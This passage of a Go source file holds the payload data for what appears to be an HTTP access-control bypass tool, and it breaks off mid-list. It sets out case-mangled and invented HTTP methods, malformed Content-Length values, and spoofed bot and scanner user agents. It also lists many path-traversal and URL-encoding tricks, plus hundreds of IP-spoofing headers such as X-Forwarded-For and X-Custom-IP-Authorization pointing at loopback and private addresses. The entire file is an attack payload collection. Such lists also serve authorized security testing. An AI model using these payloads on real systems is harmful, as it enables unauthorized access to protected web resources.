package payloads


// Payloads defines all payload data used in the tool.
var Payloads = struct {
	Methods             []string
	ContentLength       []map[string]string
	UserAgents          []string
	Paths               []string
	Headers             []map[string]string
	HeaderCombinations  []map[string]map[string]string
	ExtensionInjection  []string
	Protocols           []string
}{
	Methods: []string{ "GET", "get", "GeT", "HEAD", "head", "hEAd", "POST", "post", "PosT", "PUT", "put", "PUt", "DELETE", "delete", "delETE", "CONNECT", "connect", "CoNNeCt", "PATCH", "patch", "pAtCh", "INVENTED", "invented", "inVENTed", "TRACE", "trace", "TrAcE", "OPTIONS", "options", "oPtIOns", "ACL", "acl", "AcL", "ARBITRARY", "arbitrary", "ArBiTrArY", "BASELINE-CONTROL", "baseline-control", "BaSeLiNe-CoNtRoL", "BIND", "bind", "BiNd", "BPROPFIND", "bpropfind", "BpRoPfInD", "CHECKIN", "checkin", "ChEcKiN", "CHECKOUT", "checkout", "ChEcKoUt", "COPY", "copy", "CoPy", "LABEL", "label", "LaBeL", "LINK", "link", "LiNk", "LOCK", "lock", "LoCk", "MERGE", "merge", "MeRgE", "MKACTIVITY", "mkactivity", "MkAcTiViTy", "MKCALENDAR", "mkcalendar", "MkCaLeNdAr", "MKCOL", "mkcol", "MkCoL","MKREDIRECTREF", "mkredirectref", "MkReDiReCtReF", "MKWORKSPACE", "mkworkspace", "MkWoRkSpAcE", "MOVE", "move", "MoVe","ORDERPATCH", "orderpatch", "OrDeRpAtCh", "POUET", "pouet", "PoUeT", "PRI", "pri", "PrI", "PROPFIND", "propfind", "PrOpFiNd", "PROPPATCH", "proppatch", "PrOpPaTcH", "PURGE", "purge", "PuRgE", "QUERY", "query", "QuErY", "REBIND", "rebind", "ReBiNd", "REPORT", "report", "RePoRt", "SEARCH", "search", "SeArCh", "TRACK", "track", "TrAcK", "UNCHECKOUT", "uncheckout", "UnChEcKoUt", "UNBIND", "unbind", "UnBiNd", "UNLINK", "unlink", "UnLiNk", "UNLOCK", "unlock", "UnLoCk", "UPDATE", "update", "UpDaTe", "UPDATEREDIRECTREF", "updateredirectref", "UpDaTeReDiReCtReF", "VERSION-CONTROL", "version-control", "VeRsIoN-CoNtRoL", "CHECK",
},

	ContentLength: []map[string]string{
		{"Content-Length": "0"},
		{"Content-Length": "5"},
		{"Content-Length": "{{dynamic}}"},
		{"Content-Length": "1000"},
		{"Content-Length": "-1"},
		{"Content-Length": "99999999999999999999"},  // Overflow value
		{"Content-Length": "A"},                     // Non-numeric
		{"Content-Length": "-1A"},                     // Adrian's Payload
	},

	UserAgents: []string{
		"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
		"Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)",
		"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) sqlmap/1.5.10#stable (http://sqlmap.org)",
		"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) ZAP/2.10 (http://zaproxy.org)",
		"Wget/1.21.1 (linux-gnu)",
		"curl/7.68.0",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
		"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
		"Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36",
		"Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1",
		"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
		"Mozilla/5.0 (Linux; Android 8.0.0; LG-H930 Build/OPR1.170623.026) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36 DuckDuckBot/1.0",
		"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
		"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
		"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
		"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
		"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
		"Dalvik/2.1.0 (Linux; U; Android 11; SM-A715F Build/RP1A.200720.012)",
		"PostmanRuntime/7.29.2",
		"Insomnia/2023.4.3",
		"Mozilla/4.0 (compatible; MSIE 5.01; Windows CE)",
	},

	Paths: []string{
		"{{baseURL}}/",
		"{{baseURL}}//",
		"{{baseURL}}///",
		"{{baseURL}}/.",
		"{{baseURL}}/?",
		"{{baseURL}}??",
		"{{baseURL}}/??",
		"{{baseURL}}??/",
		"{{baseURL}}?",
		"{{baseURL}}..;/",
		"{{baseURL}}/..;/",
		"{{baseURL}}..%2f",
		"{{baseURL}}/.\\",
		"{{baseURL}}/../",
		"{{baseURL}}/..%00",
		"{{baseURL}}..;",
		"{{baseURL}}%00",
		"{{baseURL}}%20",
		"{{baseURL}}%09",
		"{{baseURL}}%2e",
		"{{baseURL}}%25",
		"{{baseURL}}%23",
		"{{baseURL}}%3b",
		"{{baseURL}}%3f",
		"{{baseURL}}%26",
		"{{baseURL}}%23",
		"{{baseURL}}/..;..%2f",
		"{{baseURL}}/..;..%2f..%2f",
		"{{baseURL}}/%2e/%2e",
		"/%2e/%2e{{baseURL}}",
		"{{baseURL}}/%2e/%2e{{baseURL}}",
		"{{baseURL}}/%2e%2e%2f",
		"{{baseURL}}/.%2e%2e%2f",
		"{{baseURL}}/%2e%2e%2f%2e%2e%2f",
		"{{baseURL}}/.%2e%2e%2e",
		"{{baseURL}}/%2e/%2e/%2e",
		"{{baseURL}}/../%2e",
		"{{baseURL}}/..%2f/",
		"{{baseURL}}/./",
		"{{baseURL}}/.%2e/",
		"{{baseURL}}/%2e/%2e/",
		"{{baseURL}}/./%2e",
		"{{baseURL}}/%2e%2e%2f./",
		"{{baseURL}}/%2e%2e%2f%2e%2e%2f",
		"{{baseURL}}/%0d%0a",
		"{{baseURL}}/%23",
		"{{baseURL}}/%2e%2e/%2e%2e/",
		"{{baseURL}}/%2e%2e%2e/%2e",
		"{{baseURL}}/%23%2e%2e",
		"{{baseURL}}/%23%2e%2e%2f",
		"{{baseURL}}/%23%2e%2e%2f%23",
		"{{baseURL}}/..;/{{baseURL}}",
		"{{baseURL}}/..;/{{baseURL}}{{baseURL}}",
		"{{baseURL}}/.%2e%2e%2f/",
		"{{baseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e",
		"{{baseURL}}/%20",
		"{{baseURL}}/%09",
		"{{baseURL}}/%23%20",
		"{{baseURL}}/%23%23",
		"{{baseURL}}/%23%23%2e%2e",
		"{{baseURL}}/%23%23%2e%2e%2e%2e%2e",
		"{{baseURL}}/%23%2e%2e%2f%23%2e%2e",
		"{{baseURL}}/%23%2e%2e/%2e%2e/",
		"{{baseURL}}/%23%23/%2e%2e/",
		"{{baseURL}}/%23%2e%2e/%2e%2e%2e/",
		"{{baseURL}}{{baseURL}}.",
		".{{baseURL}}",
		"{{baseURL}}/",
		"/{{baseURL}}",
		"%2e{{baseURL}}",
		"{{baseURL}}%2e",
		"%2f{{baseURL}}",
		"{{baseURL}}%2f",
		"%252e{{baseURL}}",
		"{{baseURL}}%252e",
		"%252f{{baseURL}}",
		"{{baseURL}}%252f",
		"{{baseURL}}/.",
		"/{{baseURL}}.",
		"/..;/{{baseURL}}",
		"/../{{baseURL}}",
		"%2e%2e/{{baseURL}}",
		"%2f%2e/{{baseURL}}",
		"//{{baseURL}}",
		"{{baseURL}}/%09",
		"{{baseURL}}/%09%3b",
		"{{baseURL}}/%09..",
		"{{baseURL}}/%09;",
		"{{baseURL}}/%20",
		"{{baseURL}}/%23",
		"{{baseURL}}/%23%3f",
		"{{baseURL}}/%252f%252f",
		"{{baseURL}}/%252f/",
		"{{baseURL}}/%2e%2e",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2f",
		"{{baseURL}}/%2f%20%23",
		"{{baseURL}}/%2f%23",
		"{{baseURL}}/%2f%2f",
		"{{baseURL}}/%2f%3b%2f",
		"{{baseURL}}/%2f%3b%2f%2f",
		"{{baseURL}}/%2f%3f",
		"{{baseURL}}/%2f%3f/",
		"{{baseURL}}/%2f/",
		"{{baseURL}}/%2f;?",
		"{{baseURL}}/%2f?;",
		"{{baseURL}}/%3b",
		"{{baseURL}}/%3b%09",
		"{{baseURL}}/%3b%2f%2e%2e",
		"{{baseURL}}/%3b%2f%2e%2e%2f%2e%2e%2f%2f",
		"{{baseURL}}/%3b%2f%2e.",
		"{{baseURL}}/%3b%2f..",
		"{{baseURL}}/%3b/%2e%2e/..%2f%2f",
		"{{baseURL}}/%3b/%2e.",
		"{{baseURL}}/%3b/%2f%2f../",
		"{{baseURL}}/%3b/..",
		"{{baseURL}}/%3b//%2f../",
		"{{baseURL}}/%3f%23",
		"{{baseURL}}/%3f%3f",
		"{{baseURL}}/%3f.php",
		"{{baseURL}}/..",
		"{{baseURL}}/..%00/",
		"{{baseURL}}/..%00/;",
		"{{baseURL}}/..%00;/",
		"{{baseURL}}/..%09",
		"{{baseURL}}/..%0d/",
		"{{baseURL}}/..%0d/;",
		"{{baseURL}}/..%0d;/",
		"{{baseURL}}/..%5c/",
		"{{baseURL}}/..%ff/",
		"{{baseURL}}/..%ff/;",
		"{{baseURL}}/..%ff;/",
		"{{baseURL}}/../",
		"{{baseURL}}/..;%00/",
		"{{baseURL}}/..;%0d/",
		"{{baseURL}}/..;%ff/",
		"{{baseURL}}/..\\",
		"{{baseURL}}/..\\;",
		"{{baseURL}}/..\\",
		"{{baseURL}}/..\\;",
		"{{baseURL}}/..\\;",
		"{{baseURL}}/..",
		"{{baseURL}}/..;/",
		"{{baseURL}}/..;/../",
		"{{baseURL}}/..;%2f",
		"{{baseURL}}/..;%2f..;%2f",
		"{{baseURL}}/..;%2f..;%2f..;%2f",
		"{{baseURL}}/..;",
		"{{baseURL}}/..;/../",
		"{{baseURL}}/..;/..;/",
		"{{baseURL}}/..;//",
		"{{baseURL}}/..;//../",
		"{{baseURL}}/..;//..;/",
		"{{baseURL}}/..;/;",
		"{{baseURL}}/..;/;/..;/",
		"{{baseURL}}/./",
		"{{baseURL}}/.//",
		"{{baseURL}}/.;/",
		"{{baseURL}}/.;",
		"{{baseURL}}//",
		"{{baseURL}}/..",
		"{{baseURL}}/../../",
		"{{baseURL}}/../../../",
		"{{baseURL}}/../../..//",
		"{{baseURL}}/../..//",
		"{{baseURL}}/../..//../",
		"{{baseURL}}/../..;/",
		"{{baseURL}}/.././../",
		"{{baseURL}}/../.;/../",
		"{{baseURL}}/..//",
		"{{baseURL}}/..//../",
		"{{baseURL}}/..//../../",
		"{{baseURL}}/..//..;/",
		"{{baseURL}}/../;/",
		"{{baseURL}}/../;/../",
		"{{baseURL}}/..;%2f",
		"{{baseURL}}/..;%2f..;%2f",
		"{{baseURL}}/..;%2f..;%2f..;%2f",
		"{{baseURL}}/..;",
		"{{baseURL}}/..;/../",
		"{{baseURL}}/..;/..;/",
		"{{baseURL}}/..;//",
		"{{baseURL}}/..;//../",
		"{{baseURL}}/..;//..;/",
		"{{baseURL}}/..;/;",
		"{{baseURL}}/..;/;/..;/",
		"{{baseURL}}/.//",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f%2f",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e",
		"{{baseURL}}/%2f%2f../",
		"{{baseURL}}/%2f/..%2f",
		"{{baseURL}}/%2f/../",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f/",
		"{{baseURL}}/%2e%2e/%2e%2e/%2f",
		"{{baseURL}}/%2e%2e%2e/",
		"{{baseURL}}/%23",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f%2f",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e",
		"{{baseURL}}/%2f%2f../",
		"{{baseURL}}/%2f/..%2f",
		"{{baseURL}}/%2f/../",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f/",
		"{{baseURL}}/%2e%2e/%2e%2e/%2f",
		"{{baseURL}}/%2e%2e%2e/",
		"{{baseURL}}/%23",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f%2f",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e",
		"{{baseURL}}/%2f%2f../",
		"{{baseURL}}/%2f/..%2f",
		"{{baseURL}}/%2f/../",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f/",
		"{{baseURL}}/%2e%2e/%2e%2e/%2f",
		"{{baseURL}}/%2e%2e%2e/",
		"{{baseURL}}/%23",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f%2f",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e",
		"{{baseURL}}/%2f%2f../",
		"{{baseURL}}/%2f/..%2f",
		"{{baseURL}}/%2f/../",
		"{{baseURL}}/%2e%2e/",
		"{{baseURL}}/%2e%2e%2f/",
		"{{baseURL}}/%2e%2e/%2e%2e/%2f",
		"{{baseURL}}/%2e%2e%2e/",
		"{{baseURL}}/%23",
	},

	Headers: []map[string]string{
		{"Ali-CDN-Real-IP": ""},
		{"Base-Url": "127.0.0.1"},
		{"cache-info": "127.0.0.1"},
		{"CF-Connecting-IP": "127.0.0.1"},
		{"COMING-FROM": "127.0.0.1"},
		{"CONNECT-VIA-IP": "127.0.0.1"},
		{"Cdn-Real-IP": ""},
		{"Cdn-Src-IP": ""},
		{"Cf-Pseudo-IPv4": ""},
		{"Contact": ""},
		{"Cdn-Server-Port": ""},
		{"Cdn-Src-Port": ""},
		{"CloudFront-Forwarded-Proto": ""},
		{"Client-IP": "*"},
		{"Client-IP": "null"},
		{"Client-IP": "norealhost"},
		{"Client-IP": "0"},
		{"Client-IP": "0177.0000.0000.0001"},
		{"Client-IP": "0x7F000001"},
		{"Client-IP": "10.0.0.0"},
		{"Client-IP": "10.0.0.1"},
		{"Client-IP": "127.0.0.1"},
		{"Client-IP": "127.0.0.1:443"},
		{"Client-IP": "127.0.0.1:80"},
		{"Client-IP": "127.1"},
		{"Client-IP": "172.16.0.0"},
		{"Client-IP": "172.16.0.1"},
		{"Client-IP": "192.168.1.0"},
		{"Client-IP": "192.168.1.1"},
		{"Client-IP": "2130706433"},
		{"Client-IP": "localhost"},
		{"Client-IP": "localhost:80"},
		{"Client-IP": "localhost:443"},
		{"Cluster-IP": ""},
		{"Cluster-Client-IP": "*"},
		{"Cluster-Client-IP": "null"},
		{"Cluster-Client-IP": "norealhost"},
		{"Cluster-Client-IP": "0"},
		{"Cluster-Client-IP": "0177.0000.0000.0001"},
		{"Cluster-Client-IP": "0x7F000001"},
		{"Cluster-Client-IP": "10.0.0.0"},
		{"Cluster-Client-IP": "10.0.0.1"},
		{"Cluster-Client-IP": "127.0.0.1"},
		{"Cluster-Client-IP": "127.0.0.1:443"},
		{"Cluster-Client-IP": "127.0.0.1:80"},
		{"Cluster-Client-IP": "127.1"},
		{"Cluster-Client-IP": "172.16.0.0"},
		{"Cluster-Client-IP": "172.16.0.1"},
		{"Cluster-Client-IP": "192.168.1.0"},
		{"Cluster-Client-IP": "192.168.1.1"},
		{"Cluster-Client-IP": "2130706433"},
		{"Cluster-Client-IP": "localhost"},
		{"Cluster-Client-IP": "localhost:80"},
		{"Cluster-Client-IP": "localhost:443"},
		{"Connection": "close"},
		{"Connection": "X-Bar"},
		{"Connection": "X-Foo"},
		{"Connection": "Close, Accept"},
		{"Connection": "Close, Accept-Application"},
		{"Connection": "Close, Accept-Charset"},
		{"Connection": "Close, Accepted"},
		{"Connection": "Close, Accept-Encoding"},
		{"Connection": "Close, Accept-Encodxng"},
		{"Connection": "Close, Accept-Language"},
		{"Connection": "Close, Accept-Ranges"},
		{"Connection": "Close, Accept-Version"},
		{"Connection": "Close, Access-Control-Allow-Credentials"},
		{"Connection": "Close, Access-Control-Allow-Headers"},
		{"Connection": "Close, Access-Control-Allow-Methods"},
		{"Connection": "Close, Access-Control-Allow-Origin"},
		{"Connection": "Close, Access-Control-Expose-Headers"},
		{"Destination": "127.0.0.1"},
		{"Disguised-Host": ""},
		{"Fastly-Client-IP": "127.0.0.1"},
		{"Forwarded": "for=127.0.0.1"},
		{"Forwarded": "127.0.0.1"},
		{"Forwarded-For-IP": ""},
		{"Forwarded-For": "{{baseURL}}"},
		{"Forwarded-For": "*"},
		{"Forwarded-For": "null"},
		{"Forwarded-For": "norealhost"},
		{"Forwarded-For": "0"},
		{"Forwarded-For": "0177.0000.0000.0001"},
		{"Forwarded-For": "0x7F000001"},
		{"Forwarded-For": "10.0.0.0"},
		{"Forwarded-For": "10.0.0.1"},
		{"Forwarded-For": "127.0.0.1"},
		{"Forwarded-For": "127.0.0.1:80"},
		{"Forwarded-For": "127.0.0.1:443"},
		{"Forwarded-For": "127.1"},
		{"Forwarded-For": "172.16.0.0"},
		{"Forwarded-For": "172.16.0.1"},
		{"Forwarded-For": "192.168.1.0"},
		{"Forwarded-For": "192.168.1.1"},
		{"Forwarded-For": "2130706433"},
		{"Forwarded-For": "localhost"},
		{"Forwarded-For": "localhost:80"},
		{"Forwarded-For": "localhost:443"},
		{"Forwarded-Host": ""},
		{"Forwarded-For-IP": ""},
		{"Forwarder": ""},
		{"Forwarder-For": ""},
		{"Forwarder-Host": ""},
		{"Forwarding": ""},
		{"Forwarding-For": ""},
		{"Forwarding-Host": ""},
		{"Forwarded-Host": ""},
		{"Http-Url": "127.0.0.1"},
		{"From": ""},
		{"Front-End-Https4": ""},
		{"Host": "*"},
		{"Host": "null"},
		{"Host": "norealhost"},
		{"Host": "0"},
		{"Host": "0177.0000.0000.0001"},
		{"Host": "0x7F000001"},
		{"Host": "10.0.0.0"},
		{"Host": "10.0.0.1"},
		{"Host": "127.0.0.1"},
		{"Host": "127.0.0.1:443"},
		{"Host": "127.0.0.1:80"},
		{"Host": "127.1"},
		{"Host": "172.16.0.0"},
		{"Host": "172.16.0.1"},
		{"Host": "192.168.1.0"},
		{"Host": "192.168.1.1"},
		{"Host": "2130706433"},
		{"Host": "localhost"},
		{"Host": "localhost:80"},
		{"Host": "localhost:443"},
		{"HTTP-CLIENT-IP": "127.0.0.1"},
		{"HTTP-FORWARDED-FOR-IP": "127.0.0.1"},
		{"HTTP-Host": ""},
		{"Http-URL": ""},
		{"HTTP-PC-REMOTE-ADDR": "127.0.0.1"},
		{"HTTP-PROXY-CONNECTION": "127.0.0.1"},
		{"Host-IP": ""},
		{"HTTP-VIA": "127.0.0.1"},
		{"HTTP-X-FORWARDED-FOR-IP": "127.0.0.1"},
		{"HTTP-X-IMFORWARDS": "127.0.0.1"},
		{"HTTP-XROXY-CONNECTION": "127.0.0.1"},
		{"IP": ""},
		{"Incap-Client-IP": ""},
		{"": ""},
		{"Origin": ""},
		{"Origin-Host": ""},
		{"Origin-IP": ""},
		{"Original-Path": ""},
		{"Original-URL": ""},
		{"Originating-IP": ""},
		{"Override-IP": ""},
		{"Path": ""},
		{"PC-REMOTE-ADDR": "127.0.0.1"},
		{"Port": ""},
		{"PRAGMA": "127.0.0.1"},
		{"Profile": ""},
		{"Proxy": "127.0.0.1"},
		{"PROXY-AUTHORIZATION": "127.0.0.1"},
		{"Proxy-Client-IP": "127.0.0.1"},
		{"PROXY-CONNECTION": "127.0.0.1"},
		{"Proxy-Host": "127.0.0.1"},
		{"Proxy-IP": ""},
		{"Proxy-Request-FullURI": ""},
		{"Proxy-Url": "127.0.0.1"},
		{"Real-Client-IP": ""},
		{"Real-IP": "127.0.0.1"},
		{"Redirect": "127.0.0.1"},
		{"Referer": "*"},
		{"Referer": "null"},
		{"Referer": "norealhost"},
		{"Referer": "0"},
		{"Referer": "0177.0000.0000.0001"},
		{"Referer": "0x7F000001"},
		{"Referer": "10.0.0.0"},
		{"Referer": "10.0.0.1"},
		{"Referer": "127.0.0.1"},
		{"Referer": "127.0.0.1:80"},
		{"Referer": "127.0.0.1:443"},
		{"Referer": "127.1"},
		{"Referer": "172.16.0.0"},
		{"Referer": "172.16.0.1"},
		{"Referer": "192.168.1.0"},
		{"Referer": "192.168.1.1"},
		{"Referer": "2130706433"},
		{"Referer": "localhost"},
		{"Referer": "localhost:80"},
		{"Referer": "localhost:443"},
		{"Referer": "{{baseURL}}"},
		{"Referrer": "127.0.0.1"},
		{"Refferer": "127.0.0.1"},
		{"Referer": "{{baseURL}}"},
		{"Referrer": "{{baseURL}}"},
		{"Refferer": "{{baseURL}}"},
		{"Remote-Addr": "127.0.0.1"},
		{"Remote-Host": ""},
		{"Remote-IP": ""},
		{"Request-Uri": "127.0.0.1"},
		{"Server": ""},
		{"Server-IP": ""},
		{"Server-Name": ""},
		{"Source-IP": "127.0.0.1"},
		{"True-Client": ""},
		{"True-Client-IP": "0"},
		{"True-Client-IP": "*"},
		{"True-Client-IP": "null"},
		{"True-Client-IP": "norealhost"},
		{"True-Client-IP": "0177.0000.0000.0001"},
		{"True-Client-IP": "0x7F000001"},
		{"True-Client-IP": "10.0.0.0"},
		{"True-Client-IP": "10.0.0.1"},
		{"True-Client-IP": "127.0.0.1"},
		{"True-Client-IP": "127.0.0.1:80"},
		{"True-Client-IP": "127.0.0.1:443"},
		{"True-Client-IP": "127.1"},
		{"True-Client-IP": "172.16.0.0"},
		{"True-Client-IP": "172.16.0.1"},
		{"True-Client-IP": "192.168.1.0"},
		{"True-Client-IP": "192.168.1.1"},
		{"True-Client-IP": "2130706433"},
		{"True-Client-IP": "localhost"},
		{"True-Client-IP": "localhost:80"},
		{"True-Client-IP": "localhost:443"},
		{"Uri": "127.0.0.1"},
		{"Url": "127.0.0.1"},
		{"Via": "127.0.0.1"},
		{"Via": "1.1 proxy"},
		{"Was-Default-Hostname": ""},
		{"WL-Proxy-Client-IP": "127.0.0.1"},
		{"XONNECTION": "127.0.0.1"},
		{"XPROXY": "127.0.0.1"},
		{"XROXY-CONNECTION": "127.0.0.1"},
		{"X-Accel-Redirect": ""},
		{"X-AppEngine-Trusted-IP-Request": ""},
		{"X-Appengine-User-IP": ""},
		{"X-Arbitrary": "127.0.0.1"},
		{"X-Azure-ClientIP": ""},
		{"X-Azure-SocketIP": ""},
		{"X-Backend-Server": ""},
		{"X-Backend-Host": "127.0.0.1"},
		{"X-BlueCoat-Via": "127.0.0.1"},
		{"X-C-IP": ""},
		{"X-Cache-Info": "127.0.0.1"},
		{"X-Cdn-Src-Port": ""},
		{"X-Cf-URL": ""},
		{"X-Client-Host": ""},
		{"X-Client-IP": "*"},
		{"X-Client-IP": "null"},
		{"X-Client-IP": "norealhost"},
		{"X-Client-IP": "0"},
		{"X-Client-IP": "0177.0000.0000.0001"},
		{"X-Client-IP": "0x7F000001"},
		{"X-Client-IP": "10.0.0.0"},
		{"X-Client-IP": "10.0.0.1"},
		{"X-Client-IP": "127.0.0.1"},
		{"X-Client-IP": "127.0.0.1:443"},
		{"X-Client-IP": "127.0.0.1:80"},
		{"X-Client-IP": "127.1"},
		{"X-Client-IP": "172.16.0.0"},
		{"X-Client-IP": "172.16.0.1"},
		{"X-Client-IP": "172.16.0.1"},
		{"X-Client-IP": "192.168.1.0"},
		{"X-Client-IP": "192.168.1.1"},
		{"X-Client-IP": "2130706433"},
		{"X-Client-IP": "localhost"},
		{"X-Client-IP": "localhost:443"},
		{"X-Client-IP": "localhost:80"},
		{"X-Cluster-IP": ""},
		{"X-Cluster-Client-IP": "127.0.0.1"},
		{"X-Coming-From": "127.0.0.1"},
		{"X-Custom-IP-Authorization": "*"},
		{"X-Custom-IP-Authorization": "null"},
		{"X-Custom-IP-Authorization": "norealhost"},
		{"X-Custom-IP-Authorization": "0"},
		{"X-Custom-IP-Authorization": "0177.0000.0000.0001"},
		{"X-Custom-IP-Authorization": "0x7F000001"},
		{"X-Custom-IP-Authorization": "10.0.0.0"},
		{"X-Custom-IP-Authorization": "10.0.0.1"},
		{"X-Custom-IP-Authorization": "127.0.0.1"},
		{"X-Custom-IP-Authorization": "127.0.0.1:80"},
		{"X-Custom-IP-Authorization": "127.0.0.1:443"},
		{"X-Custom-IP-Authorization": "localhost:80"},
		{"X-Custom-IP-Authorization": "127.1"},
		{"X-Custom-IP-Authorization": "172.16.0.0"},
		{"X-Custom-IP-Authorization": "localhost:80"},
		{"X-Custom-IP-Authorization": "172.16.0.1"},
		{"X-Custom-IP-Authorization": "192.168.1.0"},
		{"X-Custom-IP-Authorization": "192.168.1.1"},
		{"X-Custom-IP-Authorization": "2130706433"},
		{"X-Custom-IP-Authorization": "127.0.0.1"},
		{"X-Custom-IP-Authorization": "localhost"},
		{"X-Custom-IP-Authorization": "localhost:80"},
		{"X-Custom-IP-Authorization": "localhost:443"},
		{"X-DELEGATE-REMOTE-HOST": "127.0.0.1"},
		{"X-Dev-Host": ""},
		{"X-Ebay-Client-IP": ""},
		{"X-Envoy-Original-Path": ""},
		{"X-Fake-IP": ""},
		{"X-Fb-Host": ""},
		{"X-Fb-User-Remote-Addr": ""},
		{"X-Flx-Redirect-URL": ""},
		{"X-Forward-For": "{{baseURL}}"},
		{"X-Forward-For": "127.0.0.1"},
		{"X-Forwarded": "*"},
		{"X-Forwarded": "null"},
		{"X-Forwarded": "norealhost"},
		{"X-Forwarded": "0"},
		{"X-Forwarded": "0177.0000.0000.0001"},
		{"X-Forwarded": "0x7F000001"},
		{"X-Forwarded": "10.0.0.0"},
		{"X-Forwarded": "10.0.0.1"},
		{"X-Forwarded": "127.0.0.1"},
		{"X-Forwarded": "127.0.0.1:80"},
		{"X-Forwarded": "127.0.0.1:443"},
		{"X-Forwarded": "127.1"},
		{"X-Forwarded": "172.16.0.0"},
		{"X-Forwarded": "172.16.0.1"},
		{"X-Forwarded": "192.168.1.0"},
		{"X-Forwarded": "192.168.1.1"},
		{"X-Forwarded": "2130706433"},
		{"X-Forwarded": "localhost"},
		{"X-Forwarded": "localhost:80"},
		{"X-Forwarded": "localhost:443"},
		{"X-Forwarded-By": "127.0.0.1"},
		{"X-Forwarded-For": "{{baseURL}}"},
		{"X-Forwarded-For": "*"},
		{"X-Forwarded-For": "null"},
		{"X-Forwarded-For": "norealhost"},
		{"X-Forwarded-For": "0"},
		{"X-Forwarded-For": "0177.0000.0000.0001"},
		{"X-Forwarded-For": "0x7F000001"},
		{"X-Forwarded-For": "10.0.0.0"},
		{"X-Forwarded-For": "10.0.0.1"},
		{"X-Forwarded-For": "127.0.0.1"},
		{"X-Forwarded-For": "127.0.0.111111"},
		{"X-Forwarded-For": "127.0.0.1:80"},
		{"X-Forwarded-For": "127.0.0.1:443"},
		{"X-Forwarded-For": "127.1"},
		{"X-Forwarded-For": "172.16.0.0"},
		{"X-Forwarded-For": "172.16.0.1"},
		{"X-Forwarded-For": "192.168.1.0"},
		{"X-Forwarded-For": "192.168.1.1"},
		{"X-Forwarded-For": "12.34.56.78"},
		{"X-Forwarded-For": "23.45.67.89"},
		{"X-Forwarded-For": "2130706433"},
		{"X-Forwarded-For": "localhost"},
		{"X-Forwarded-For": "localhost:80"},
		{"X-Forwarded-For": "localhost:443"},
		{"X-Forwarded-For-IP": "127.0.0.1"},
		{"X-Forwarded-For-Original": "127.0.0.1"},
		{"X-Forwarded-From": ""},
		{"X-Forwarded-Host": "127.0.0.1"},
		{"X-Forwarded-Path": ""},
		{"X-Forwarded-Port": "80"},
		{"X-Forwarded-Port": "443"},
		{"X-Forwarded-Port": "454"},
		{"X-Forwarded-Port": "8080"},
		{"X-Forwarded-Port": "8443"},
		{"X-Forwarded-Port": "4443"},
		{"X-Forwarded-Proto": "127.0.0.1"},
		{"X-Forwarded-HTTPS": ""},
		{"X-Forwarded-Scheme": "http"},
		{"X-Forwarded-Scheme": "https"},
		{"X-Forwarded-Server": "127.0.0.1"},
		{"X-Forwarded-URI": ""},
		{"X-Forwarded-URL": ""},
		{"X-Forwarded-SSL": ""},
		{"X-Forwarder": ""},
		{"X-Forwarder-For": ""},
		{"X-Forwarder-Host": ""},
		{"X-Forwarding": ""},
		{"X-Forwarding-For": ""},
		{"X-Forwarding-Host": ""},
		{"X-From": ""},
		{"X-From-IP": ""},
		{"X-Gateway-Host": "127.0.0.1"},
		{"X-Host": "127.0.0.1"},
		{"X-Host-IP": ""},
		{"X-Host-Override": ""},
		{"X-Http-Destinationurl": "127.0.0.1"},
		{"X-Http-Host-Override": "127.0.0.1"},
		{"X-HTTP-Method": ""},
		{"X-HTTP-Method-Override": "PUT"},
		{"X-HTTP-Method-Override": "POST"},
		{"X-HTTP-Path-Override": ""},
		{"X-IMFORWARDS": "127.0.0.1"},
		{"X-IP": "127.0.0.1"},
		{"X-IP-Addr": ""},
		{"X-IP-Address": ""},
		{"X-IP-Trail": ""},
		{"X-LOCKING": "127.0.0.1"},
		{"X-LOOKING": "127.0.0.1"},
		{"X-MS-Endpoint-Absolute-Path": ""},
		{"X-MS-Forwarded-Client-IP": ""},
		{"X-MS-ADFS-Proxy-Client-IP": ""},
		{"X-Method-Override": ""},
		{"X-Ning-Request-URI": ""},
		{"X-Nokia-ipaddress": ""},
		{"X-Origin": ""},
		{"X-Origin-Host": ""},
		{"X-Origin-IP": ""},
		{"X-Original-For": ""},
